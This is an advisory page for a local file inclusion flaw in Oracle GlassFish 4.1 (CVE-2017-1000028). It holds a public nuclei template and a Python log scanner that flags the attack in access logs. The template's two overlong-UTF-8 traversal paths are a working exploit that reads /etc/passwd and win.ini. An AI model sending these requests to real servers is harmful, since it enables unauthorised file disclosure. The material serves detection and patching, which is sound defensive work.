CVE-2017-1000028: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion

Date: 2025-08-01 | Affected software: Oracle GlassFish Server Open Source Edition 4.1 | PoC: public

Vulnerability description

Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.

PoC code [public]

id: CVE-2017-1000028

info:
  name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion
  author: pikpikcu,daffainfo
  severity: high
  description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.exploit-db.com/exploits/45196
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    - https://www.exploit-db.com/exploits/45196/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000028
    cwe-id: CWE-22
    epss-score: 0.9387
    epss-percentile: 0.99865
    cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,oracle,glassfish,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
      - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100ca1cda0bf25a6e981e218454ddc24506d41bdf8681a429d418a84eb89f617caa0220521adf2da89cd0f5655ae811a6d61d1a71849833492e180cdaafab2ff31c4606:922c64590222798bb761d5b6d8e72950
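
Both request paths in the template hide ../ behind overlong UTF-8 encodings of "." and "/" (%c0%ae and %c0%af). The Python below is an added example, not part of the template or of any Oracle or nuclei code: it folds those encodings back to ASCII and flags such requests in an access log. The combined log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# A two-byte UTF-8 sequence led by 0xC0 or 0xC1 is "overlong": it encodes a
# code point below 0x80, so %c0%ae is '.' and %c0%af is '/' to a lax decoder.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
# Combined log format: client, request line, status (assumed layout).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def fold_overlong(raw: bytes) -> bytes:
    """Replace each overlong pair with the single ASCII byte it decodes to."""
    def ascii_byte(m):
        lead, cont = m.group()
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return OVERLONG.sub(ascii_byte, raw)

def classify(path: str) -> str:
    """Label one request path after percent-decoding and overlong folding."""
    raw = unquote_to_bytes(path.split("?", 1)[0])
    folded = fold_overlong(raw)
    dotdot = b".." in re.split(rb"[/\\]", folded)
    if folded != raw:
        return "overlong-traversal" if dotdot else "overlong"
    return "traversal" if dotdot else "clean"

def scan(lines):
    """Return (client, verdict, status, path) for every non-clean request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (verdict := classify(m.group(2))) != "clean":
            hits.append((m.group(1), verdict, int(m.group(3)), m.group(2)))
    return hits

SAMPLE_LOG = [  # constructed access-log lines, not captured traffic
    '192.0.2.10 - - [01/Aug/2025:10:00:00 +0000] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET /docs/caf%c3%a9.html HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /static/../robots.txt HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for client, verdict, status, path in scan(SAMPLE_LOG):
        note = "served (investigate)" if status == 200 else "rejected"
        print(f"{client} {verdict} {status} {note} {path}")
```

A 200 status on an overlong-traversal hit mirrors the template's own matcher condition and is the case to triage first. Valid multi-byte UTF-8 such as %c3%a9 is left alone because only the C0 and C1 lead bytes are folded.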
